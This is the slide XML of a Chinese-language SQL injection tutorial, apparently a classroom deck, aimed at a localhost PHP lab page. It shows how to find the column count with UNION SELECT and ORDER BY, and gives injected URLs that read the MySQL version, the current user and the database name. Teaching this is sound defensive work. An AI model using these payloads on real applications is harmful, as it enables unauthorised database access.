            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>数量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>ORDER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>BY</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3260897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583140"/>
            <a:ext cx="10698004" cy="4558353"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>①使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>并增加列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id,name,price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> FROM articles where id=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id,name,price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> FROM articles where id=1 UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1—— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id,name,price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> FROM articles where id=1 UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1,2—— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id,name,price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> FROM articles where id=1 UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1,2,3——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句并增加列数。如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句连接的两个查询返回的列数不同，数据库会报错。因此可以通过这个方法来猜测列数 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注：这个是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法理论，与其它数据库可能不同。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1,2,3……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>null,null,null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两端的字段类型需要一致（或兼容）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152953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3940365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>②使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ORDER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>BY	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句，返回的结果会根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句选择的列进行排序，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ORDER BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后可以是列名，也可以是第几列的数字，如果列数超出现有值，数据库会报错。因此可以通过这个方法可以找到最后一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://localhost/cat.php?id=1%20order%20by%205  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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671" y="3821016"/>
            <a:ext cx="9882230" cy="2694208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25791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149" y="1327385"/>
            <a:ext cx="10840597" cy="3940365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>试信息：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自带的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>The database version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://localhost/cat.php?id=1%20UNION%20SELECT%201,@@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>version,3,4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="913149" y="4052815"/>
            <a:ext cx="8192070" cy="1365345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1790884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149" y="1327385"/>
            <a:ext cx="10840597" cy="3940365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>试信息：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自带的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>version(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>database()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0"/>
              <a:t>the current user:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost/cat.php?id=1%20UNION%20SELECT%201,current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>user(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>3,4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="913149" y="4090844"/>
            <a:ext cx="8313334" cy="1845932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1899594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149" y="1327385"/>
            <a:ext cx="10840597" cy="3940365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>试信息：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自带的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>version(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>database()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>the current database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost/cat.php?id=1%20UNION%20SELECT%201,database(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>3,4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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913148" y="4092409"/>
            <a:ext cx="7577071" cy="1817072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
